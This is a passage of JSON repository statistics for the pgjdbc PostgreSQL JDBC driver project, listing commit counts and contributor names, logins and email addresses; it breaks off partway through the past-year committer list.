namespaces"}}],"commits":{"id":18827,"full_name":"pgjdbc/pgjdbc","default_branch":"master","total_commits":3952,"total_committers":355,"total_bot_commits":61,"total_bot_committers":3,"mean_commits":11.132394366197182,"dds":0.811740890688259,"past_year_total_commits":357,"past_year_total_committers":30,"past_year_total_bot_commits":3,"past_year_total_bot_committers":1,"past_year_mean_commits":11.9,"past_year_dds":0.49299719887955185,"last_synced_at":"2026-06-18T12:00:17.363Z","last_synced_commit":"41ec61cc8af7e9307394f8d6a78f510eb5b3ff2d","created_at":"2023-03-07T11:39:03.191Z","updated_at":"2026-06-18T11:40:03.786Z","committers":[{"name":"Vladimir Sitnikov","email":"sitnikov.vladimir@gmail.com","login":"vlsi","count":744},{"name":"Kris Jurka","email":"books@ejurka.com","login":"kjurka","count":571},{"name":"Dave Cramer","email":"davecramer@gmail.com","login":"davecramer","count":519},{"name":"Mend Renovate","email":"bot@renovateapp.com","login":"renovate-bot","count":408},{"name":"Dave Cramer","email":"davec@fastcrypt.com","login":null,"count":173},{"name":"Sehrope Sarkuni","email":"sehrope@jackdb.com","login":"sehrope","count":160},{"name":"Bruce Momjian","email":"bruce@momjian.us","login":"bmomjian","count":154},{"name":"Barry Lind","email":"barry@xythos.com","login":null,"count":133},{"name":"Jorge Solorzano","email":"jorsol@gmail.com","login":"jorsol","count":74},{"name":"Dave Cramer","email":"dave.cramer@credativ.ca","login":null,"count":67},{"name":"renovate[bot]","email":"29139614+renovate[bot]","login":"renovate[bot]","count":57},{"name":"Peter Mount","email":"peter@retep.org.uk","login":null,"count":45},{"name":"Alexis Meneses","email":"alexismeneses","login":"alexismeneses","count":43},{"name":"AlexElin","email":"alexey.elin@list.ru","login":"AlexElin","count":36},{"name":"Craig Ringer","email":"craig@2ndquadrant.com","login":"ringerc","count":36},{"name":"Oliver Jowett","email":"oliver@opencloud.com","login":null,"count":33},{"name":"pgjdbc CI","email":"pgsql-jdbc@postgresql.org","login":null,"count":28},{"name":"Philippe Marschall","email":"philippe.marschall@gmail.com","login":"marschall","count":27},{"name":"Brett Okken","email":"brett.okken.os@gmail.com","login":"bokken","count":22},{"name":"Marc G. Fournier","email":"scrappy@hub.org","login":"scrappy","count":22},{"name":"Pavel Raiskup","email":"praiskup@redhat.com","login":"praiskup","count":19},{"name":"Peter Eisentraut","email":"peter_e@gmx.net","login":"petere","count":19},{"name":"Heikki Linnakangas","email":"heikki.linnakangas@iki.fi","login":"hlinnaka","count":17},{"name":"Stephen Nelson","email":"stephen@eccostudio.com","login":"lordnelson","count":16},{"name":"tminglei","email":"tmlneu@gmail.com","login":"tminglei","count":15},{"name":"Jeremy Whiting","email":"jwhiting@redhat.com","login":null,"count":13},{"name":"Vladimir Gordiychuk","email":"folyga@gmail.com","login":"Gordiychuk","count":11},{"name":"Christian Schlichtherle","email":"christian@schlichtherle.de","login":"christian-schlichtherle","count":7},{"name":"bpd0018","email":"bpd0018@gmail.com","login":"bpd0018","count":7},{"name":"benoit","email":"b.wiart@ubik-ingenierie.com","login":"benbenw","count":5},{"name":"Jeremy Whiting","email":"whitingjr@hotmail.com","login":null,"count":5},{"name":"Michael Glaesemann","email":"grzm@seespotcode.net","login":"grzm","count":5},{"name":"Phillip Ross","email":"phillip.w.g.ross@gmail.com","login":"phillipross","count":5},{"name":"Rikard Pavelic","email":"rikard@ngs.hr","login":"zapov","count":5},{"name":"Christian Ullrich","email":"chris@chrullrich.net","login":"chrullrich","count":5},{"name":"Sergey Nuyanzin","email":"snuyanzin@gmail.com","login":"snuyanzin","count":5},{"name":"Mahmoud Bahaa","email":"mahmoud.bahaa@incorta.com","login":"mahmoudbahaa","count":4},{"name":"George Kankava","email":"george.kankava@devfactory.com","login":null,"count":4},{"name":"Mike Goodman","email":"MSGoodman","login":"MSGoodman","count":4},{"name":"Tigran Mkrtchyan","email":"tigran.mkrtchyan@desy.de","login":"kofemann","count":4},{"name":"Vishal Raj","email":"vishalraj1802@gmail.com","login":"vishalvrv9","count":4},{"name":"Laurenz Albe","email":"laurenz.albe@wien.gv.at","login":null,"count":4},{"name":"plan3d","email":"76825073+plan3d","login":"plan3d","count":4},{"name":"slmsbrhgn","email":"slmsbrhgn@gmail.com","login":"slmsbrhgn","count":4},{"name":"Michael Paquier","email":"michael@otacoo.com","login":null,"count":4},{"name":"Zemian Deng","email":"zemiandeng@gmail.com","login":"zemian","count":3},{"name":"Valentine Gogichashvili","email":"valgog@gmail.com","login":"valgog","count":3},{"name":"draderaws","email":"41007433+draderaws","login":"draderaws","count":3},{"name":"Uwe Schindler","email":"uwe@thetaphi.de","login":"uschindler","count":3},{"name":"Sophiah Ho","email":"182134868+SophiahHo","login":"SophiahHo","count":3},{"name":"Sergey Ignatov","email":"sergey.ignatov@jetbrains.com","login":"ignatov","count":3},{"name":"adrklos","email":"adrian.kloskowski@heimdalldata.com","login":"adrklos","count":3},{"name":"github-actions[bot]","email":"41898282+github-actions[bot]","login":"github-actions[bot]","count":3},{"name":"pip25","email":"pip25","login":"pip25","count":3},{"name":"rnveach","email":"rveach02@gmail.com","login":"rnveach","count":3},{"name":"Christopher Deckers","email":"chrriis@gmail.com","login":"Chrriis","count":3},{"name":"Roman Ivanov","email":"romani","login":"romani","count":3},{"name":"Marek Läll","email":"42849684+MarekUniq","login":"MarekUniq","count":3},{"name":"Justin Santa Barbara","email":"justin@fathomdb.com","login":"justinsb","count":3},{"name":"Jesper Pedersen","email":"jesper.pedersen@redhat.com","login":"jesperpedersen","count":3},{"name":"Jeremy Mailen","email":"jeremy@divebell.com","login":"jeremymailen","count":3},{"name":"Alaa Attya Mohamed","email":"alaa.attya91@gmail.com","login":"AlaaAttya","count":3},{"name":"Chen Huajun","email":"chjischj@163.com","login":"ChenHuajun","count":3},{"name":"Fiona Tay","email":"me@fionatay.com","login":"tay","count":3},{"name":"Alexey Mozhenin","email":"amozhenin@issart.com","login":null,"count":3},{"name":"Nick White","email":"nwhite@palantir.com","login":null,"count":3},{"name":"Roman Konoval","email":"roman.konoval@willowcode.com","login":"romank0","count":2},{"name":"Sanne Grinovero","email":"sanne@hibernate.org","login":"Sanne","count":2},{"name":"SheerazMajeedM","email":"sheerazmajeed01@gmail.com","login":"SheerazMajeedM","count":2},{"name":"Simon Strassl","email":"simon@sigmoid.at","login":"strassl","count":2},{"name":"Sualeh Fatehi","email":"sualeh@hotmail.com","login":"sualeh","count":2},{"name":"Thach Hoang","email":"thachhoang","login":"thachhoang","count":2},{"name":"Ivan","email":"vaano94@gmail.com","login":"vaano94","count":2},{"name":"Joe Kutner","email":"jpkutner@gmail.com","login":"jkutner","count":2},{"name":"MMeent","email":"boekewurm@gmail.com","login":"MMeent","count":2},{"name":"Markus KARG","email":"karg@quipsy.de","login":"quipsy-karg","count":2},{"name":"Markus KARG","email":"markus@headcrashing.eu","login":"mkarg","count":2},{"name":"Martin Simka","email":"msimka@redhat.com","login":"simkam","count":2},{"name":"Mathias Fußenegger","email":"mfussenegger","login":"mfussenegger","count":2},{"name":"Mauryan Kansara","email":"mauryankansaramk@gmail.com","login":"Zopsss","count":2},{"name":"Alexander Kjäll","email":"alexander.kjall@gmail.com","login":"alexanderkjall","count":2},{"name":"Andrei Lurie","email":"alurie","login":"alurie","count":2},{"name":"Andrej Golovnin","email":"andrej.golovnin@googlemail.com","login":"golovnin","count":2},{"name":"Davide Angelocola","email":"dfa1","login":"dfa1","count":2},{"name":"Crunchy Builder","email":"john.harvey@crunchydata.com","login":"crunchyjohn","count":2},{"name":"Mohit-Attry","email":"atrrmohit@gmail.com","login":"mohitsatr","count":2},{"name":"Tom Dunstan","email":"github@tomd.cc","login":"tomdcc","count":2},{"name":"Árpád Magosányi","email":"m4gw4s@gmail.com","login":"magwas","count":2},{"name":"bjanczak","email":"bartlomiej.janczak@gmail.com","login":"bjanczak","count":2},{"name":"ivlo11","email":"ivlo11@gmail.com","login":"ivlo11","count":2},{"name":"kazachka","email":"kazachka@mail.ua","login":"kazachka","count":2},{"name":"mjschwaiger","email":"mjschwaiger@gmail.com","login":"mjschwaiger","count":2},{"name":"nicolas-f","email":"github@nettrader.fr","login":"nicolas-f","count":2},{"name":"shenfeng","email":"shenfeng197@gmail.com","login":"ShenFeng312","count":2},{"name":"vharseko","email":"vharseko@openam.org.ru","login":"vharseko","count":2},{"name":"吴伟杰","email":"wuweijie@apache.org","login":"TeslaCN","count":2},{"name":"Mykola Nikishov","email":"mn@mn.com.ua","login":"manandbytes","count":2},{"name":"Nathan VanBenschoten","email":"nvanbenschoten@gmail.com","login":"nvanbenschoten","count":2},{"name":"Olivier Bourgain","email":"olivierbourgain02@gmail.com","login":"obourgain","count":2},{"name":"Patric Bechtel","email":"p.bechtel@oashi.com","login":"patric42","count":2},{"name":"Pavel Bludov","email":"pbludov@ya.ru","login":"pbludov","count":2},{"name":"Zhenlei Huang","email":"3699228+gmshake","login":"gmshake","count":2},{"name":"TomonariKatsumata","email":"katsumata@localhost.localdomain","login":null,"count":2},{"name":"cchantep","email":"chantepie@altern.org","login":null,"count":2},{"name":"Kushal Pisavadia","email":"kushal.pisavadia@digital.cabinet-office.gov.uk","login":null,"count":2},{"name":"Lőrinc Pap","email":"lorinc@gradle.com","login":null,"count":2},{"name":"Michael McCaskill","email":"michael@team.shoeboxed.com","login":null,"count":2},{"name":"Bryan Varner","email":"bvarner@polarislabs.com","login":null,"count":2},{"name":"Guoyu Feng","email":"feng_guoyu@uxsino.com","login":null,"count":2},{"name":"Mikko Tiihonen","email":"mikko.tiihonen@nitorcreations.com","login":null,"count":2},{"name":"Harinath Kanchu","email":"kanchuharinath@gmail.com","login":"harinath001","count":2},{"name":"Hari Babu Kommi","email":"kommi.haribabu@gmail.com","login":"kommiharibabu","count":2},{"name":"Hajar Razip","email":"38566952+mshajarrazip","login":"mshajarrazip","count":2},{"name":"GregN","email":"gregn@fast.au.fujitsu.com","login":"gregn123","count":2},{"name":"Frode Carlsen","email":"frode.odde.carlsen@nav.no","login":"frode-carlsen","count":2},{"name":"David A. Ventimiglia","email":"dventimi@gmail.com","login":"dventimi","count":2},{"name":"Chapman Flack","email":"chap@anastigmatix.net","login":"jcflack","count":2},{"name":"Atsushi Torikoshi","email":"atorik@gmail.com","login":"atorik","count":2},{"name":"Rob Bygrave","email":"robin.bygrave@gmail.com","login":"rbygrave","count":2},{"name":"Bernd","email":"bernd@eckenfels.net","login":"ecki","count":1},{"name":"Brendan MacDonell","email":"macdonellba@gmail.com","login":"bremac","count":1},{"name":"Brett Wooldridge","email":"brett.wooldridge@gmail.com","login":"brettwooldridge","count":1},{"name":"Chris [SpareParts365]","email":"56319603+Chris-SP365","login":"Chris-SP365","count":1},{"name":"Christian Beikov","email":"christian.beikov@gmail.com","login":"beikov","count":1},{"name":"Christian Fredriksson","email":"50839054+cfredri4","login":"cfredri4","count":1},{"name":"Christian Kotzbauer","email":"christian.kotzbauer@gmail.com","login":"ckotzbauer","count":1},{"name":"Christian Ramseyer","email":"ramseyer@netnea.com","login":"rc9000","count":1},{"name":"Benjamin van der Veen","email":"benjamin@survantjames.com","login":"bvanderveen","count":1},{"name":"Barnabas Bodnar","email":"barnabas.bodnar@ser.de","login":"bbodnar","count":1},{"name":"Anmol Sharma","email":"anmol20102005@gmail.com","login":"Anmol202005","count":1},{"name":"Abhishek-kumar09","email":"abhimait1909@gmail.com","login":"Abhishek-kumar09","count":1},{"name":"Adam Brusselback","email":"adambrusselback@gmail.com","login":"Tostino","count":1},{"name":"Adrien","email":"arobert@delfingen.com","login":"arobert-delfingen","count":1},{"name":"Agata Naomichi","email":"agatan039@gmail.com","login":"agatan","count":1},{"name":"Christoph Berg","email":"cb@df7cb.de","login":"df7cb","count":1},{"name":"mtran","email":"mtran@dhatim.com","login":null,"count":1},{"name":"Toddy69","email":"3174167+Toddy69","login":"Toddy69","count":1},{"name":"Eduardo Souza","email":"eduardomatosouza@gmail.com","login":"emsouza","count":1},{"name":"Doug Mayer","email":"me@doxavore.com","login":"doxavore","count":1},{"name":"Dongming","email":"ldming101@gmail.com","login":"ldming","count":1},{"name":"Dmitriy Tseyler","email":"tseylerd@gmail.com","login":"tseylerd","count":1},{"name":"Dmitriy Mukhin","email":"mitya555","login":"mitya555","count":1},{"name":"Dennis Benzinger | SAP Hybris","email":"dennis.benzinger@sap.com","login":"dennis-benzinger-hybris","count":1},{"name":"Declan Murphy","email":"declan.murphy@flightclub.io","login":"decmurphy","count":1},{"name":"David Schlosnagle","email":"davids@palantir.com","login":"schlosna","count":1},{"name":"David Rader","email":"david.rader@gmail.com","login":"davidradernj","count":1},{"name":"David R. Bild","email":"drbild@willbild.com","login":"drbild","count":1},{"name":"David Maplesden","email":"david@maplesden.co.nz","login":"dmap","count":1},{"name":"Andrey Frolov","email":"andrey.frolov@booking.com","login":null,"count":1},{"name":"Byron Foster","email":"byron@base2.cc","login":null,"count":1},{"name":"Daisuke","email":"higuchi.daisuke@jp.fujitsu.com","login":null,"count":1},{"name":"Dave Cramer","email":"davec@Daves-MacBook-Air.local","login":null,"count":1},{"name":"Gili Tzabari","email":"cowwoc@bbs.darktech.org","login":null,"count":1},{"name":"Ivan Leskin","email":"leskin.in@arenadata.io","login":null,"count":1},{"name":"Jan Wieck","email":"JanWieck@Yahoo.com","login":null,"count":1},{"name":"Kingter Wang","email":"tew@vmware.com","login":null,"count":1},{"name":"Kyotaro Horiguchi","email":"horiguchi.kyotaro@lab.ntt.co.jp","login":null,"count":1},{"name":"Local account since AD was removed","email":"jacobsonl@sudn-fade1.six3.local","login":null,"count":1},{"name":"Mike Noordermeer","email":"mike@eveoh.nl","login":null,"count":1},{"name":"Patrick Radtke","email":"pradtke@stanford.edu","login":null,"count":1},{"name":"Petro Semeniuk","email":"psemeniuk@atlassian.com","login":null,"count":1},{"name":"Robert Zenz","email":"robert.zenz@sibvisions.com","login":null,"count":1},{"name":"Sehrope Sarkuni","email":"sehrop@jackdb.com","login":null,"count":1},{"name":"Steven Schlansker","email":"steven@likeness.com","login":null,"count":1},{"name":"Tanya Gordeeva","email":"tgordeeva@palantir.com","login":null,"count":1},{"name":"Valentine Gogichashvili","email":"vgogichashvili@vgogichashvili-ubuntu","login":null,"count":1},{"name":"chj","email":"chj@10.167.159.99","login":null,"count":1},{"name":"Andrew Taylor","email":"andrew@brekka.org","login":"andrewtaylor","count":1},{"name":"Andrew Guibert","email":"andy.guibert@gmail.com","login":"aguibert","count":1},{"name":"Andrew Dunstan","email":"andrew.dunstan@2ndQuadrant.com","login":"adunstan","count":1},{"name":"Andrei Paikin","email":"andreypaykin@gmail.com","login":"strkkk","count":1},{"name":"Andrei Arkaev","email":"arkaev","login":"arkaev","count":1},{"name":"Andrea Catalucci","email":"a.catalucci@gmail.com","login":"AndreaCatalucci","count":1},{"name":"Alexandre Boyer","email":"33391039+ng-galien","login":"ng-galien","count":1},{"name":"Alexander Nesterenok","email":"65724881+anesterenok","login":"anesterenok","count":1},{"name":"Aleksander Lantsov","email":"51023305+lantalex","login":"lantalex","count":1},{"name":"Alan","email":"31561207+ajacob98","login":"ajacob98","count":1},{"name":"AlBundy33","email":"therealhawk@freenet.de","login":"AlBundy33","count":1},{"name":"Steinar Bang","email":"sb@dod.no","login":"steinarb","count":1},{"name":"Steve Ungerer","email":"steve@crimsonhexagon.com","login":"scubasau","count":1},{"name":"Svein Baardsen","email":"svein.baardsen@gmail.com","login":"baardsen","count":1},{"name":"Sven Diedrichsen","email":"sven.diedrichsen@gmail.com","login":"svendiedrichsen","count":1},{"name":"Tim Ward","email":"timothyjward@apache.org","login":"timothyjward","count":1},{"name":"Harry Chan","email":"38070640+hc-codersatlas","login":"hc-codersatlas","count":1},{"name":"Tom Aizenberg","email":"tom.aizenberg@gmail.com","login":"Tomtomgo","count":1},{"name":"Tom Eicher","email":"tom@tomeicher.de","login":"teicher","count":1},{"name":"Tom Lane","email":"tgl@sss.pgh.pa.us","login":"tglsfdc","count":1},{"name":"Torsten Brodbeck","email":"56440929+tbrodbeck-adc","login":"tbrodbeck-adc","count":1},{"name":"Trygve Laugstøl","email":"trygvis@inamo.no","login":"trygvis","count":1},{"name":"Tyson Andre","email":"tyson.andre@uwaterloo.ca","login":"TysonAndre","count":1},{"name":"Vivek Wassan","email":"65421598+vwassan","login":"vwassan","count":1},{"name":"Vsevolod Kaimashnikov","email":"vsevolodk","login":"vsevolodk","count":1},{"name":"Vyom Yadav","email":"73882557+Vyom-Yadav","login":"Vyom-Yadav","count":1},{"name":"Wei Su","email":"suwei19870312@gmail.com","login":"suwei111333","count":1},{"name":"Yao Chunlin","email":"chunlinyao@gmail.com","login":"chunlinyao","count":1},{"name":"Yuriy Yudin","email":"jurixmath@mail.ru","login":"junixar","count":1},{"name":"Zuzana Miklankova","email":"90186537+zmiklank","login":"zmiklank","count":1},{"name":"apetrelli","email":"antonio.petrelli@gmail.com","login":"apetrelli","count":1},{"name":"aryabukhin","email":"aryabukhin@gmail.com","login":"aryabukhin","count":1},{"name":"azraino","email":"azraino","login":"azraino","count":1},{"name":"Power","email":"kozlovr@gmail.com","login":"Powerrr","count":1},{"name":"Praveen Kumar","email":"praveen729483@gmail.com","login":"Praveen7294","count":1},{"name":"Pritesh Ranjan","email":"priteshranjan01@gmail.com","login":"priteshranjan01","count":1},{"name":"Rafał Krzewski","email":"rafal.krzewski@caltha.pl","login":"rkrzewski","count":1},{"name":"Rafi Shamim","email":"rafiss@gmail.com","login":"rafiss","count":1},{"name":"Ramin Orujov","email":"raminorujov@gmail.com","login":"raminorujov","count":1},{"name":"Rico Neubauer","email":"r.neubauer@seeburger.de","login":"MrEasy","count":1},{"name":"Robert 'Bobby' Zenz","email":"Robert.Zenz@bonsaimind.org","login":"RobertZenz","count":1},{"name":"Robert J. Macomber","email":"robert.macomber@socrata.com","login":"rjmac","count":1},{"name":"Robert von Burg","email":"eitch@eitchnet.ch","login":"eitch","count":1},{"name":"Russell Briggs","email":"dupski","login":"dupski","count":1},{"name":"Sasa Vilic","email":"sasavilic@gmail.com","login":"sasavilic","count":1},{"name":"Sasasu","email":"i@sasa.su","login":"Sasasu","count":1},{"name":"Sebastian Baumhekel","email":"sebastian.baumhekel@gmail.com","login":"sebasbaumh","count":1},{"name":"Sebastian Utz","email":"su@rtme.net","login":"seut","count":1},{"name":"Selene Feigl","email":"890054+sfeigl","login":"sfeigl","count":1},{"name":"Sergey Prytkov","email":"shallowstack@gmail.com","login":"Rattenkrieg","count":1},{"name":"Sidi Mohamed EL AATIFI","email":"elaatifi@gmail.com","login":"elaatifi","count":1},{"name":"Simon Greatrix","email":"simon@pippsford.com","login":"simon-greatrix","count":1},{"name":"Simon Stelling","email":"stellingsimon","login":"stellingsimon","count":1},{"name":"Skye Book","email":"skye.book@gmail.com","login":"skyebook","count":1},{"name":"Sodekim","email":"70255432+sodekim","login":"sodekim","count":1},{"name":"kili668","email":"64861394+kili668","login":"kili668","count":1},{"name":"maffe","email":"maffe","login":"maffe","count":1},{"name":"maltalex","email":"alex@bit48.net","login":"maltalex","count":1},{"name":"marcmuel","email":"marcus.mueller@schwarz-infosysteme.de","login":"marcmuel","count":1},{"name":"mjanczykowski","email":"mjanczykowski","login":"mjanczykowski","count":1},{"name":"mkoncek","email":"29146829+mkoncek","login":"mkoncek","count":1},{"name":"mmm444","email":"michal.rydlo@gmail.com","login":"mmm444","count":1},{"name":"odubaj","email":"44674278+odubaj","login":"odubaj","count":1},{"name":"paulo-kluh","email":"80355988+paulo-kluh","login":"paulo-kluh","count":1},{"name":"pbe-axelor","email":"p.belloy@axelor.com","login":"pbe-axelor","count":1},{"name":"pbillen","email":"33231406+pbillen","login":"pbillen","count":1},{"name":"reibitto","email":"reibitto","login":"reibitto","count":1},{"name":"robin.bygrave","email":"robin.bygrave@eroad.com","login":"rob-bygrave","count":1},{"name":"rtrier","email":"42410362+rtrier","login":"rtrier","count":1},{"name":"seregamorph","email":"serega.morph@gmail.com","login":"seregamorph","count":1},{"name":"sly461","email":"32794108+sly461","login":"sly461","count":1},{"name":"sz-liva","email":"33718672+sz-liva","login":"sz-liva","count":1},{"name":"trtrmitya","email":"trtrmitya@gmail.com","login":"trtrmitya","count":1},{"name":"xpoinsard","email":"xpoinsard","login":"xpoinsard","count":1},{"name":"zhurs","email":"sergey.zhuravlev@gmail.com","login":"zhurs","count":1},{"name":"Álvaro Hernández Tortosa","email":"aht@8kdata.com","login":"ahachete","count":1},{"name":"Étienne BERSAC","email":"bersace03@gmail.com","login":"bersace","count":1},{"name":"bazzargh","email":"brian.ewins@gmail.com","login":"bazzargh","count":1},{"name":"bd-infor","email":"bd-infor","login":"bd-infor","count":1},{"name":"bshehata","email":"bshehata@atlassian.com","login":"bilal-shehata","count":1},{"name":"chalda","email":"ochaloup@redhat.com","login":"ochaloup","count":1},{"name":"costa100","email":"costa.basil@gmail.com","login":"costa100","count":1},{"name":"crwr45","email":"34647635+crwr45","login":"crwr45","count":1},{"name":"damienb-opt","email":"36661255+damienb-opt","login":"damienb-opt","count":1},{"name":"david-whs","email":"116106321+david-whs","login":"david-whs","count":1},{"name":"dependabot[bot]","email":"49699333+dependabot[bot]","login":"dependabot[bot]","count":1},{"name":"dh-cloud","email":"60729713+dh-cloud","login":"dh-cloud","count":1},{"name":"djydewang","email":"djydewang@gmail.com","login":"djydewang","count":1},{"name":"dosimeta","email":"dosimeta@gmail.com","login":"dosimeta","count":1},{"name":"eperez","email":"edpeur@gmail.com","login":"eperez","count":1},{"name":"epgrubmair","email":"grubmair@emarsys.com","login":"epgrubmair","count":1},{"name":"goeland86","email":"goeland86@gmail.com","login":"goeland86","count":1},{"name":"halset","email":"halset@ecc.no","login":"halset","count":1},{"name":"hyunkshinft","email":"49164320+hyunkshinft","login":"hyunkshinft","count":1},{"name":"iceback","email":"robjsargent@gmail.com","login":"iceback","count":1},{"name":"imran zaheer","email":"izaheer612@gmail.com","login":"imranzaheer612","count":1},{"name":"itchyny","email":"itchyny@hatena.ne.jp","login":"itchyny","count":1},{"name":"jajalvipul","email":"jajalvipul@gmail.com","login":"jajalvipul","count":1},{"name":"kaiwangchen","email":"kaiwang.chen@gmail.com","login":"kaiwangchen","count":1},{"name":"JCzogalla","email":"35594017+JCzogalla","login":"JCzogalla","count":1},{"name":"JY Cr","email":"jycr","login":"jycr","count":1},{"name":"Jacques Fuentes","email":"jpfuentes2@gmail.com","login":"jpfuentes2","count":1},{"name":"James","email":"jmt158@gmail.com","login":"jamesthomp","count":1},{"name":"James Howe","email":"675056+OrangeDog","login":"OrangeDog","count":1},{"name":"Jamie Pullar","email":"jpullar@gmail.com","login":"JamiePullar","count":1},{"name":"Jan Van den Bergh","email":"jan.vdbergh@gmail.com","login":"janvdbergh","count":1},{"name":"Japin Li","email":"japinli@hotmail.com","login":"japinli","count":1},{"name":"Jean-Christophe Arnu","email":"jcarnu@gmail.com","login":"jcarnu","count":1},{"name":"Jeff Klukas","email":"jeff@klukas.net","login":"jklukas","count":1},{"name":"Jelte Fennema","email":"github-tech@jeltef.nl","login":"JelteF","count":1},{"name":"Jeremy Whiting","email":"jeremy.whiting@hushmail.com","login":"whitingjr","count":1},{"name":"Joe Jensen","email":"joe.m.jensen@gmail.com","login":"joejensen","count":1},{"name":"JoelRabinovitch","email":"joel.rabinovitch@tecsys.com","login":"JoelRabinovitch","count":1},{"name":"Jordan Lewis","email":"jordanthelewis@gmail.com","login":"jordanlewis","count":1},{"name":"Josh Soref","email":"2119212+jsoref","login":"jsoref","count":1},{"name":"Joshua Gardner","email":"joshgardner2000@gmail.com","login":"jgardn3r","count":1},{"name":"Juha Syrjälä","email":"juha.syrjala+github@iki.fi","login":"jsyrjala","count":1},{"name":"Kairav Mittal","email":"kairavmittal@gmail.com","login":"aclfe","count":1},{"name":"Kamal Kumlien","email":"kkumlien","login":"kkumlien","count":1},{"name":"Kazuhiro Sera","email":"seratch@gmail.com","login":"seratch","count":1},{"name":"Kenneth Geisshirt","email":"geisshirt@gmail.com","login":"kneth","count":1},{"name":"Daniel Migowski","email":"dmigowski@ikoffice.de","login":"dmigowski","count":1},{"name":"Daniel Gustafsson","email":"daniel@hobbit.se","login":"danielgustafsson","count":1},{"name":"Emmanuel Oppong","email":"eoppong@gsumail.gram.edu","login":"emmaeng700","count":1},{"name":"Eric McCormack","email":"eric.mccormack@enterprisedb.com","login":"ericmack","count":1},{"name":"Eric Peterson","email":"elpete","login":"elpete","count":1},{"name":"Eugene Koontz","email":"ekoontz@hiro-tan.org","login":"ekoontz","count":1},{"name":"Evgeniy Devyatykh","email":"devyatyh@gmail.com","login":"john9x","count":1},{"name":"Fabio Cechinel Veronez","email":"fabio.veronez@gmail.com","login":"fcv","count":1},{"name":"Faizan Qazi","email":"fqazi","login":"fqazi","count":1},{"name":"Feng zhihao","email":"Fzhlib","login":"Fzhlib","count":1},{"name":"Florin Asăvoaie","email":"FlorinAsavoaie","login":"FlorinAsavoaie","count":1},{"name":"Frane Roje","email":"39126829+franetw","login":"franetw","count":1},{"name":"George Gastaldi","email":"gegastaldi@gmail.com","login":"gastaldi","count":1},{"name":"Gilles Cornu","email":"git@gilles.cornu.name","login":"gildegoma","count":1},{"name":"Goooler","email":"wangzongler@gmail.com","login":"Goooler","count":1},{"name":"Hans Ginzel","email":"hans@matfyz.cz","login":"hginzel","count":1},{"name":"Damiano Albani","email":"damiano.albani@gmail.com","login":"dalbani","count":1},{"name":"Hugh Cole-Baker","email":"sigmaris@gmail.com","login":"sigmaris","count":1},{"name":"Hugo Abreu","email":"6619758+hugomiguelabreu","login":"hugomiguelabreu","count":1},{"name":"Igor Volkov","email":"1859437+virtual-machinist","login":"virtual-machinist","count":1},{"name":"ItaiFonio","email":"itai.fonio@sap.com","login":"ItaiFonio","count":1},{"name":"IvyDev0","email":"yiyid@andrew.cmu.edu","login":"IvyDev0","count":1},{"name":"Mark Nguyen","email":"Mrk-Nguyen","login":"Mrk-Nguyen","count":1},{"name":"Markus Winand","email":"markus.winand@winand.at","login":"fatalmind","count":1},{"name":"Martin Desruisseaux","email":"martin.desruisseaux@geomatys.com","login":"desruisseaux","count":1},{"name":"Matteo Melli","email":"teoincontatto","login":"teoincontatto","count":1},{"name":"Matthias Hanisch","email":"hanisch.matthias@googlemail.com","login":"reallyinsane","count":1},{"name":"Michael","email":"michaelzg","login":"michaelzg","count":1},{"name":"Michael Ernst","email":"mernst@cs.washington.edu","login":"mernst","count":1},{"name":"Michail Nikolaev","email":"michail.nikolaev@gmail.com","login":"michail-nikolaev","count":1},{"name":"Michał Wyrzykowski","email":"w.michal1@gmail.com","login":"wyrzyk","count":1},{"name":"Michele Mancioppi","email":"michele.mancioppi@sap.com","login":"michele-mancioppi","count":1},{"name":"Mohanad Khaled","email":"67065678+MohanadKh03","login":"MohanadKh03","count":1},{"name":"Myo Wai Thant","email":"40167572+myowaithant9","login":"myowaithant9","count":1},{"name":"N-Coder","email":"nfink95@gmail.com","login":"N-Coder","count":1},{"name":"Nick Burgan","email":"13688219+nmburgan","login":"nmburgan","count":1},{"name":"Nick Hall","email":"github@nickh.net","login":"nrhall","count":1},{"name":"Nick Mancuso","email":"31252532+nmancus1","login":"nmancus1","count":1},{"name":"Nikolai Ivanov","email":"nicktorwald","login":"nicktorwald","count":1},{"name":"Pawel","email":"pawel.veselov@gmail.com","login":"veselov","count":1},{"name":"Peter De Wachter","email":"pdewacht@gmail.com","login":"pdewacht","count":1},{"name":"Philip Sanetra","email":"PSanetra","login":"PSanetra","count":1},{"name":"Philipp Menke","email":"github@pmenke.de","login":"pmenke-de","count":1},{"name":"Piyush Sharma","email":"ps26oct@gmail.com","login":"voidfist","count":1},{"name":"Kevin Wooten","email":"kdubb@me.com","login":"kdubb","count":1},{"name":"Kevin222004","email":"kevinpatel222004@gmail.com","login":"Kevin222004","count":1},{"name":"Kim Johan Andersson","email":"31474178+kimjand","login":"kimjand","count":1},{"name":"KimBisgaardDmi","email":"37800626+KimBisgaardDmi","login":"KimBisgaardDmi","count":1},{"name":"Kingter Wang","email":"kingter@gmail.com","login":"kingter","count":1},{"name":"Knut Olav Løite","email":"koloite@gmail.com","login":"olavloite","count":1},{"name":"Knut Wannheden","email":"knut.wannheden@gmail.com","login":"knutwannheden","count":1},{"name":"Krzysztof Szafrański","email":"k.p.szafranski@gmail.com","login":"kszafran","count":1},{"name":"Laurenz Albe","email":"laurenz","login":"laurenz","count":1},{"name":"Lonny","email":"gmljacobson@gmail.com","login":"lonnyj","count":1},{"name":"Lukas Javorsky","email":"ljavorsk@redhat.com","login":"ljavorsk","count":1},{"name":"Lőrinc Pap","email":"pap.lorinc@gmail.com","login":"l0rinc","count":1},{"name":"Maciek Sakrejda","email":"m.sakrejda@gmail.com","login":"msakrejda","count":1},{"name":"Magnus","email":"magJ","login":"magJ","count":1},{"name":"Magnus Hagander","email":"magnus@hagander.net","login":"mhagander","count":1},{"name":"Magnus Reftel","email":"magnus.reftel@gmail.com","login":"reftel","count":1},{"name":"Manon van Tilburg","email":"35914140+m-van-tilburg","login":"m-van-tilburg","count":1},{"name":"Marc Dean","email":"marc.dean.jr@gmail.com","login":"deanmarc25","count":1},{"name":"Marc Slemko","email":"marcs@znep.com","login":"znep","count":1},{"name":"Marios Trivyzas","email":"marios@crate.io","login":"matriv","count":1},{"name":"Mark Blakley","email":"163172869+mblakley-casana","login":"mblakley-casana","count":1},{"name":"Mark Grobaker","email":"5614366+mgrobaker","login":"mgrobaker","count":1},{"name":"μtkarsh","email":"61664827+utkar-sh-ukla","login":"utkar-sh-ukla","count":1}],"past_year_committers":[{"name":"Mend Renovate","email":"bot@renovateapp.com","login":"renovate-bot","count":181},{"name":"Vladimir Sitnikov","email":"sitnikov.vladimir@gmail.com","login":"vlsi","count":95},{"name":"Dave 